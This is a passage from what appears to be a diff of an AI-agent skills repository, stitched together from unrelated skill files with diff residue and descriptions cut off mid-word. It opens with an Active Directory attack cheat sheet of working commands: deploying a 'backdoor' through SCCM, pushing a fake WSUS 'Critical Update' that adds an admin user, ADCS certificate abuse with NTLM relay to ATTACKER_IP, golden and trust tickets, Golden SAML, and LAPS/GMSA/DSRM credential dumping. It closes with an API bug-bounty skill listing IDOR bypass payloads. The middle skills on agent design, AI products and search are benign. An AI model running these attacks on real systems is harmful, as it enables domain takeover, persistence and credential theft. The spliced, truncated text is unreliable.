- ID of the krbtgt account of the RODC (-rodcNo)

```bash
# Impacket keylistattack
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full

# Using secretsdump with keylist
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
```

**Using Rubeus:**
```powershell
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
```

---

## SCCM/WSUS Deployment

### SCCM Attack with MalSCCM

```bash
# Locate SCCM server
MalSCCM.exe locate

# Enumerate targets
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers

# Create target group
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC

# Create malicious app
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"

# Deploy
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update

# Force checkin
MalSCCM.exe checkin /groupname:TargetGroup

# Cleanup
MalSCCM.exe app /cleanup /name:backdoor
MalSCCM.exe group /delete /groupname:TargetGroup
```

### SCCM Network Access Accounts

```powershell
# Find SCCM blob
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

# Decrypt with SharpSCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```

### WSUS Deployment Attack

```bash
# Using SharpWSUS
SharpWSUS.exe locate
SharpWSUS.exe inspect

# Create malicious update
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"

# Deploy to target
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"

# Check status
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local

# Cleanup
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
```

---

## AD Certificate Services (ADCS)

### ESC1 - Misconfigured Templates

The template allows ENROLLEE_SUPPLIES_SUBJECT together with a Client Authentication EKU, so any enrollee can request a certificate for an arbitrary UPN.

```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable

# Request certificate as admin
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```

### ESC4 - ACL Vulnerabilities

```bash
# Check for WriteProperty
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl

# Add ENROLLEE_SUPPLIES_SUBJECT flag
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

# Perform ESC1, then restore
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
```

### ESC8 - NTLM Relay to Web Enrollment

```bash
# Start relay
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce authentication
python3 petitpotam.py ATTACKER_IP DC_IP

# Use certificate
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
```

### Shadow Credentials

```bash
# Add Key Credential (pyWhisker)
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add

# Get TGT with PKINIT
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache

# Get NT hash
export KRB5CCNAME=target.ccache
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
```

---

## Trust Relationship Attacks

### Child to Parent Domain (SID History)

```powershell
# Get Enterprise Admins SID from parent
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"

# Create Golden Ticket with SID History
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
```

### Forest to Forest (Trust Ticket)

```powershell
# Dump trust key
lsadump::trust /patch

# Forge inter-realm TGT
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi

# Use trust ticket
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
```

---

## ADFS Golden SAML

**Requirements:**
- ADFS service account access
- Token signing certificate (PFX + decryption password)

```bash
# Dump with ADFSDump
.\ADFSDump.exe

# Forge SAML token
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
```

---

## Credential Sources

### LAPS Password

```powershell
# PowerShell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# CrackMapExec
crackmapexec ldap DC_IP -u user -p password -M laps
```

### GMSA Password

```powershell
# PowerShell + DSInternals
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
```

```bash
# Linux with bloodyAD
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
```

### Group Policy Preferences (GPP)

```bash
# Find in SYSVOL
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml

# Decrypt
python3 Get-GPPPassword.py -no-pass 'DC_IP'
```

### DSRM Credentials

```powershell
# Dump DSRM hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# Enable DSRM admin logon
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
```

---

## Linux AD Integration

### CCACHE Ticket Reuse

```bash
# Find tickets
ls /tmp/ | grep krb5cc

# Use ticket
export KRB5CCNAME=/tmp/krb5cc_1000
```

### Extract from Keytab

```bash
# List keys
klist -k /etc/krb5.keytab

# Extract with KeyTabExtract
python3 keytabextract.py /etc/krb5.keytab
```

### Extract from SSSD

```bash
# Database location
/var/lib/sss/secrets/secrets.ldb

# Key location
/var/lib/sss/secrets/.secrets.mkey

# Extract
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```

---

**New file:** `skills/address-github-comments/SKILL.md` (55 lines)

---
name: address-github-comments
description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
---

# Address GitHub Comments

## Overview

Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.

## Prerequisites

Ensure `gh` is authenticated.

```bash
gh auth status
```

If not logged in, run `gh auth login`.

## Workflow

### 1. Inspect Comments

Fetch the comments for the current branch's PR.

```bash
gh pr view --comments
```

Or use a custom script if available to list threads.

### 2. Categorize and Plan

- List the comments and review threads.
- Propose a fix for each.
- **Wait for user confirmation** on which comments to address first if there are many.
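
A machine-readable listing can help with triage; a sketch using the `gh` JSON output (the `--jq` expression assumes the documented shape of the `comments` field):

```bash
# List comment authors and bodies as JSON objects for triage
gh pr view --json comments --jq '.comments[] | {author: .author.login, body: .body}'
```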

### 3. Apply Fixes

Apply the code changes for the selected comments.

### 4. Respond to Comments

Once fixed, reply to the threads and mark them as resolved.

```bash
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
```

## Common Mistakes

- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
- **Not verifying auth**: Check `gh auth status` before starting.

---

**New file:** `skills/agent-evaluation/SKILL.md` (64 lines)

---
name: agent-evaluation
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks. Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Evaluation

You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
production. You've learned that evaluating LLM agents is fundamentally different from
testing traditional software—the same input can produce different outputs, and "correct"
often has no single answer.

You've built evaluation frameworks that catch issues before production: behavioral regression
tests, capability assessments, and reliability metrics. You understand that the goal isn't
100% test pass rate—it

## Capabilities

- agent-testing
- benchmark-design
- capability-assessment
- reliability-metrics
- regression-testing

## Requirements

- testing-fundamentals
- llm-fundamentals

## Patterns

### Statistical Test Evaluation

Run tests multiple times and analyze result distributions
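
The pattern above can be sketched in shell; the `run_agent_test` function is a hypothetical stand-in that simulates a flaky agent test:

```bash
# Simulate a flaky agent test: passes roughly 70% of runs
run_agent_test() { [ $((RANDOM % 10)) -lt 7 ] && echo PASS || echo FAIL; }

# Run it 50 times and summarize the result distribution instead of trusting one run
for i in $(seq 1 50); do run_agent_test; done | sort | uniq -c
```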

### Behavioral Contract Testing

Define and test agent behavioral invariants

### Adversarial Testing

Actively try to break agent behavior

## Anti-Patterns

### ❌ Single-Run Testing

### ❌ Only Happy Path Tests

### ❌ Output String Matching

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |

## Related Skills

Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`

---

**New file:** `skills/agent-manager-skill/SKILL.md` (40 lines)

---
name: agent-manager-skill
description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
---

# Agent Manager Skill

## When to use

Use this skill when you need to:

- run multiple local CLI agents in parallel (separate tmux sessions)
- start/stop agents and tail their logs
- assign tasks to agents and monitor output
- schedule recurring agent work (cron)

## Prerequisites

Install `agent-manager-skill` in your workspace:

```bash
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
```

## Common commands

```bash
python3 agent-manager/scripts/main.py doctor
python3 agent-manager/scripts/main.py list
python3 agent-manager/scripts/main.py start EMP_0001
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
Follow teams/fractalmind-ai-maintenance.md Workflow
EOF
```

## Notes

- Requires `tmux` and `python3`.
- Agents are configured under an `agents/` directory (see the repo for examples).

---

**New file:** `skills/agent-memory-systems/SKILL.md` (67 lines)

---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragm"
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Memory Systems

You are a cognitive architect who understands that memory makes agents intelligent.
You've built memory systems for agents handling millions of interactions. You know
that the hard part isn't storing - it's retrieving the right memory at the right time.

Your core insight: Memory failures look like intelligence failures. When an agent
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
not a storage problem. You obsess over chunking strategies, embedding quality,
and

## Capabilities

- agent-memory
- long-term-memory
- short-term-memory
- working-memory
- episodic-memory
- semantic-memory
- procedural-memory
- memory-retrieval
- memory-formation
- memory-decay

## Patterns

### Memory Type Architecture

Choosing the right memory type for different information

### Vector Store Selection Pattern

Choosing the right vector database for your use case

### Chunking Strategy Pattern

Breaking documents into retrievable chunks

## Anti-Patterns

### ❌ Store Everything Forever

### ❌ Chunk Without Testing Retrieval

### ❌ Single Memory Type for All Data

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
| Issue | high | ## Test different sizes |
| Issue | high | ## Always filter by metadata first |
| Issue | high | ## Add temporal scoring |
| Issue | medium | ## Detect conflicts on storage |
| Issue | medium | ## Budget tokens for different memory types |
| Issue | medium | ## Track embedding model in metadata |

## Related Skills

Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`

---

**New file:** `skills/agent-tool-builder/SKILL.md` (53 lines)

---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementa"
source: vibeship-spawner-skills (Apache 2.0)
---

# Agent Tool Builder

You are an expert in the interface between LLMs and the outside world.
You've seen tools that work beautifully and tools that cause agents to
hallucinate, loop, or fail silently. The difference is almost always
in the design, not the implementation.

Your core insight: The LLM never sees your code. It only sees the schema
and description. A perfectly implemented tool with a vague description
will fail. A simple tool with crystal-clear documentation will succeed.

You push for explicit error hand

## Capabilities

- agent-tools
- function-calling
- tool-schema-design
- mcp-tools
- tool-validation
- tool-error-handling

## Patterns

### Tool Schema Design

Creating clear, unambiguous JSON Schema for tools

### Tool with Input Examples

Using examples to guide LLM tool usage

### Tool Error Handling

Returning errors that help the LLM recover

## Anti-Patterns

### ❌ Vague Descriptions

### ❌ Silent Failures

### ❌ Too Many Tools

## Related Skills

Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`

---

**New file:** `skills/ai-agents-architect/SKILL.md` (90 lines)
|
||||
---
|
||||
name: ai-agents-architect
|
||||
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Agents Architect
|
||||
|
||||
**Role**: AI Agent Systems Architect
|
||||
|
||||
I build AI systems that can act autonomously while remaining controllable.
|
||||
I understand that agents fail in unexpected ways - I design for graceful
|
||||
degradation and clear failure modes. I balance autonomy with oversight,
|
||||
knowing when an agent should ask for help vs proceed independently.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent architecture design
|
||||
- Tool and function calling
|
||||
- Agent memory systems
|
||||
- Planning and reasoning strategies
|
||||
- Multi-agent orchestration
|
||||
- Agent evaluation and debugging
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM API usage
|
||||
- Understanding of function calling
|
||||
- Basic prompt engineering
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Loop
|
||||
|
||||
Reason-Act-Observe cycle for step-by-step execution
|
||||
|
||||
```javascript
|
||||
- Thought: reason about what to do next
|
||||
- Action: select and invoke a tool
|
||||
- Observation: process tool result
|
||||
- Repeat until task complete or stuck
|
||||
- Include max iteration limits
|
||||
```
### Plan-and-Execute

Plan first, then execute steps:

```
- Planning phase: decompose task into steps
- Execution phase: execute each step
- Replanning: adjust plan based on results
- Separate planner and executor models possible
```
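A compact sketch of the planner/executor split, assuming a hypothetical `planner` that decomposes the task into step strings and an `executor` that returns `(ok, output)` per step:

```python
# Plan-and-Execute sketch: plan once, run steps one at a time,
# and replan (up to a limit) when a step fails.
def plan_and_execute(planner, executor, task, max_replans=1):
    plan = list(planner(task))                 # Planning phase
    results, replans = [], 0
    while plan:
        step = plan.pop(0)
        ok, output = executor(step)            # Execution phase
        if ok:
            results.append(output)
        elif replans < max_replans:            # Replanning on failure
            replans += 1
            plan = list(planner(task))
        else:
            break
    return results
```

In practice the planner and executor can be different models, as noted above.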
### Tool Registry

Dynamic tool discovery and management:

```
- Register tools with schema and examples
- Tool selector picks relevant tools for task
- Lazy loading for expensive tools
- Usage tracking for optimization
```
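A minimal registry sketch covering registration, selection, and usage tracking. The keyword-overlap selector is deliberately naive and illustrative; real selectors often use embeddings.

```python
# Tool registry sketch: register tools with a description, select the
# ones relevant to a task, and track how often each is called.
class ToolRegistry:
    def __init__(self):
        self._tools = {}
        self.usage = {}                        # usage tracking

    def register(self, name, fn, description):
        self._tools[name] = {"fn": fn, "description": description}

    def select(self, task):
        # Keep tools whose description shares a word with the task.
        words = set(task.lower().split())
        return [n for n, t in self._tools.items()
                if words & set(t["description"].lower().split())]

    def call(self, name, *args):
        self.usage[name] = self.usage.get(name, 0) + 1
        return self._tools[name]["fn"](*args)
```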
## Anti-Patterns

### ❌ Unlimited Autonomy

### ❌ Tool Overload

### ❌ Memory Hoarding

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent loops without iteration limits | critical | Always set limits |
| Vague or incomplete tool descriptions | high | Write complete tool specs |
| Tool errors not surfaced to agent | high | Explicit error handling |
| Storing everything in agent memory | medium | Selective memory |
| Agent has too many tools | medium | Curate tools per task |
| Using multiple agents when one would work | medium | Justify multi-agent |
| Agent internals not logged or traceable | medium | Implement tracing |
| Fragile parsing of agent outputs | medium | Robust output handling |

## Related Skills

Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
54
skills/ai-product/SKILL.md
Normal file
@@ -0,0 +1,54 @@
---
name: ai-product
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
source: vibeship-spawner-skills (Apache 2.0)
---

# AI Product Development

You are an AI product engineer who has shipped LLM features to millions of users. You've debugged hallucinations at 3am, optimized prompts to reduce costs by 80%, and built safety systems that caught thousands of harmful outputs. You know that demos are easy and production is hard. You treat prompts as code, validate all outputs, and never trust an LLM blindly.
## Patterns

### Structured Output with Validation

Use function calling or JSON mode with schema validation.
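A minimal sketch of that validation step using only the standard library; the schema shape and field names are illustrative, not a fixed API:

```python
import json

# Validate an LLM's JSON output against a minimal expected schema.
# The schema maps field name -> required type; extra fields are ignored.
def validate_output(raw, schema):
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return None                  # reject non-JSON output entirely
    for field, expected_type in schema.items():
        if not isinstance(data.get(field), expected_type):
            return None              # reject missing or mistyped fields
    return data
```

Returning `None` instead of raising lets the caller decide whether to retry the model call or fall back.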
### Streaming with Progress

Stream LLM responses to show progress and reduce perceived latency.
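The idea reduces to yielding partial text as chunks arrive instead of waiting for the full completion. A provider-agnostic sketch, where `chunks` stands in for an API stream:

```python
# Streaming sketch: emit progressively longer partial text per chunk,
# so the UI can render something immediately.
def stream_text(chunks):
    buffer = []
    for chunk in chunks:
        buffer.append(chunk)
        yield "".join(buffer)    # partial text so far
```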
### Prompt Versioning and Testing

Version prompts in code and test with a regression suite.
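One way to sketch this: keep versioned prompt strings in code and pin expected behavior with a regression check. Prompt names and contents here are illustrative.

```python
# Versioned prompts as code: each change gets a new version entry.
PROMPTS = {
    "summarize": {
        "v1": "Summarize the text.",
        "v2": "Summarize the text in one sentence.",
    }
}

def get_prompt(name, version="v2"):
    return PROMPTS[name][version]

def regression_check(render, cases):
    """cases: list of (input, required_substring) pairs.
    Returns the failing cases; an empty list means the prompt passes."""
    return [(i, want) for i, want in cases if want not in render(i)]
```

Running the check in CI catches a prompt edit that silently drops a required instruction.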
## Anti-Patterns

### ❌ Demo-ware

**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.

### ❌ Context window stuffing

**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.

### ❌ Unstructured output parsing

**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting LLM output without validation | critical | Always validate output |
| User input directly in prompts without sanitization | critical | Add defense layers |
| Stuffing too much into context window | high | Calculate tokens before sending |
| Waiting for complete response before showing anything | high | Stream responses |
| Not monitoring LLM API costs | high | Track cost per request |
| App breaks when LLM API fails | high | Defense in depth |
| Not validating facts from LLM responses | critical | Verify factual claims |
| Making LLM calls in synchronous request handlers | high | Use async patterns |
273
skills/ai-wrapper-product/SKILL.md
Normal file
@@ -0,0 +1,273 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
source: vibeship-spawner-skills (Apache 2.0)
---

# AI Wrapper Product

**Role**: AI Product Architect

You know AI wrappers get a bad rap, but the good ones solve real problems. You build products where AI is the engine, not the gimmick. You understand that prompt engineering is product development. You balance costs with user experience. You create AI products people actually pay for and use daily.
## Capabilities

- AI product architecture
- Prompt engineering for products
- API cost management
- AI usage metering
- Model selection
- AI UX patterns
- Output quality control
- AI product differentiation
## Patterns

### AI Product Architecture

Building products around AI APIs.

**When to use**: When designing an AI-powered product

#### The Wrapper Stack

```
User Input
    ↓
Input Validation + Sanitization
    ↓
Prompt Template + Context
    ↓
AI API (OpenAI/Anthropic/etc.)
    ↓
Output Parsing + Validation
    ↓
User-Friendly Response
```

#### Basic Implementation

```javascript
import Anthropic from '@anthropic-ai/sdk';

const anthropic = new Anthropic();

async function generateContent(userInput, context) {
  // 1. Validate input
  if (!userInput || userInput.length > 5000) {
    throw new Error('Invalid input');
  }

  // 2. Build prompt
  const systemPrompt = `You are a ${context.role}.
Always respond in ${context.format}.
Tone: ${context.tone}`;

  // 3. Call API
  const response = await anthropic.messages.create({
    model: 'claude-3-haiku-20240307',
    max_tokens: 1000,
    system: systemPrompt,
    messages: [{
      role: 'user',
      content: userInput
    }]
  });

  // 4. Parse and validate output
  const output = response.content[0].text;
  return parseOutput(output);
}
```

#### Model Selection

| Model | Cost | Speed | Quality | Use Case |
|-------|------|-------|---------|----------|
| GPT-4o | $$$ | Fast | Best | Complex tasks |
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
| Claude 3 Haiku | $ | Fastest | Good | High volume |
### Prompt Engineering for Products

Production-grade prompt design.

**When to use**: When building AI product prompts

#### Prompt Template Pattern

```javascript
const promptTemplates = {
  emailWriter: {
    system: `You are an expert email writer.
Write professional, concise emails.
Match the requested tone.
Never include placeholder text.`,
    user: (input) => `Write an email:
Purpose: ${input.purpose}
Recipient: ${input.recipient}
Tone: ${input.tone}
Key points: ${input.points.join(', ')}
Length: ${input.length} sentences`,
  },
};
```

#### Output Control

```javascript
// Force structured output
const systemPrompt = `
Always respond with valid JSON in this format:
{
  "title": "string",
  "content": "string",
  "suggestions": ["string"]
}
Never include any text outside the JSON.
`;

// Parse with fallback
function parseAIOutput(text) {
  try {
    return JSON.parse(text);
  } catch {
    // Fallback: extract JSON from response
    const match = text.match(/\{[\s\S]*\}/);
    if (match) return JSON.parse(match[0]);
    throw new Error('Invalid AI output');
  }
}
```

#### Quality Control

| Technique | Purpose |
|-----------|---------|
| Examples in prompt | Guide output style |
| Output format spec | Consistent structure |
| Validation | Catch malformed responses |
| Retry logic | Handle failures |
| Fallback models | Reliability |
### Cost Management

Controlling AI API costs.

**When to use**: When building profitable AI products

#### Token Economics

```javascript
// Track usage
async function callWithCostTracking(userId, prompt) {
  const response = await anthropic.messages.create({...});

  // Log usage
  await db.usage.create({
    userId,
    inputTokens: response.usage.input_tokens,
    outputTokens: response.usage.output_tokens,
    cost: calculateCost(response.usage),
    model: 'claude-3-haiku',
  });

  return response;
}

function calculateCost(usage) {
  const rates = {
    'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
  };
  const rate = rates['claude-3-haiku'];
  return (usage.input_tokens * rate.input +
          usage.output_tokens * rate.output) / 1_000_000;
}
```

#### Cost Reduction Strategies

| Strategy | Savings |
|----------|---------|
| Use cheaper models | 10-50x |
| Limit output tokens | Variable |
| Cache common queries | High |
| Batch similar requests | Medium |
| Truncate input | Variable |

#### Usage Limits

```javascript
async function checkUsageLimits(userId) {
  const usage = await db.usage.sum({
    where: {
      userId,
      createdAt: { gte: startOfMonth() }
    }
  });

  const limits = await getUserLimits(userId);
  if (usage.cost >= limits.monthlyCost) {
    throw new Error('Monthly limit reached');
  }
  return true;
}
```
## Anti-Patterns

### ❌ Thin Wrapper Syndrome

**Why bad**: No differentiation. Users just use ChatGPT. No pricing power. Easy to replicate.

**Instead**: Add domain expertise. Perfect the UX for a specific task. Integrate into workflows. Post-process outputs.

### ❌ Ignoring Costs Until Scale

**Why bad**: Surprise bills. Negative unit economics. Can't price properly. Business isn't viable.

**Instead**: Track every API call. Know your cost per user. Set usage limits. Price with margin.

### ❌ No Output Validation

**Why bad**: AI hallucinates. Inconsistent formatting. Bad user experience. Trust issues.

**Instead**: Validate all outputs. Parse structured responses. Have fallback handling. Post-process for consistency.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| AI API costs spiral out of control | high | Control AI costs |
| App breaks when hitting API rate limits | high | Handle rate limits |
| AI gives wrong or made-up information | high | Handle hallucinations |
| AI responses too slow for good UX | medium | Improve AI latency |

## Related Skills

Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
66
skills/algolia-search/SKILL.md
Normal file
@@ -0,0 +1,66 @@
---
name: algolia-search
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning. Use when: adding search to, algolia, instantsearch, search api, search functionality."
source: vibeship-spawner-skills (Apache 2.0)
---

# Algolia Search Integration

## Patterns

### React InstantSearch with Hooks

Modern React InstantSearch setup using hooks for type-ahead search.

Uses the react-instantsearch-hooks-web package with the algoliasearch client. Widgets are components that can be customized with classnames.

Key hooks:

- useSearchBox: Search input handling
- useHits: Access search results
- useRefinementList: Facet filtering
- usePagination: Result pagination
- useInstantSearch: Full state access

### Next.js Server-Side Rendering

SSR integration for Next.js with the react-instantsearch-nextjs package.

Use `<InstantSearchNext>` instead of `<InstantSearch>` for SSR. Supports both the Pages Router and the App Router (experimental).

Key considerations:

- Set dynamic = 'force-dynamic' for fresh results
- Handle URL synchronization with the routing prop
- Use getServerState for initial state

### Data Synchronization and Indexing

Indexing strategies for keeping Algolia in sync with your data.

Three main approaches:

1. Full Reindexing - Replace the entire index (expensive)
2. Full Record Updates - Replace individual records
3. Partial Updates - Update specific attributes only

Best practices:

- Batch records (ideal: 10MB, 1K-10K records per batch)
- Use incremental updates when possible
- Use partialUpdateObjects for attribute-only changes
- Avoid deleteBy (computationally expensive)
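The batching guideline above reduces to chunking your records before sending them; a small illustrative helper (not part of the Algolia client, record count from the guideline):

```python
# Split records into batches of at most `batch_size` before indexing,
# keeping each save/partial-update call within recommended limits.
def batch_records(records, batch_size=1000):
    return [records[i:i + batch_size]
            for i in range(0, len(records), batch_size)]
```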
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@@ -0,0 +1,430 @@
---
name: API Fuzzing for Bug Bounty
description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
---

# API Fuzzing for Bug Bounty

## Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

## Inputs/Prerequisites

- Burp Suite or similar proxy tool
- API wordlists (SecLists, api_wordlist)
- Understanding of REST/GraphQL/SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)

## Outputs/Deliverables

- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Unauthorized data access documentation
---

## API Types Overview

| Type | Protocol | Data Format | Structure |
|------|----------|-------------|-----------|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom Query | Single endpoint |

---

## Core Workflow

### Step 1: API Reconnaissance

Identify API type and enumerate endpoints:

```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json
```
### Step 2: Authentication Testing

```bash
# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login

# Check rate limiting on auth endpoints
# If no rate limit → brute force possible

# Test mobile vs web API separately
# Don't assume same security controls
```
### Step 3: IDOR Testing

Insecure Direct Object Reference is the most common API vulnerability:

```bash
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235

# Even if the ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders
```
**IDOR Bypass Techniques:**

```bash
# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```
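When fuzzing, the variant list above can be generated programmatically. A sketch in Python (payload shapes follow the list; the function name and exact output format are ours, for authorized testing only):

```python
# Generate IDOR bypass payload variants for one JSON body field.
def idor_variants(field, victim_id, legit_id):
    return [
        {field: victim_id},                    # plain swap
        {field: [victim_id]},                  # wrap ID in array
        {field: {field: victim_id}},           # JSON wrap
        {field: "*"},                          # wildcard injection
        # parameter pollution: duplicate key, victim value last
        '{"%s":%r,"%s":%r}' % (field, legit_id, field, victim_id),
    ]
```

Each variant is then sent in place of the original body field while watching for a response that returns the victim's data.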
### Step 4: Injection Testing

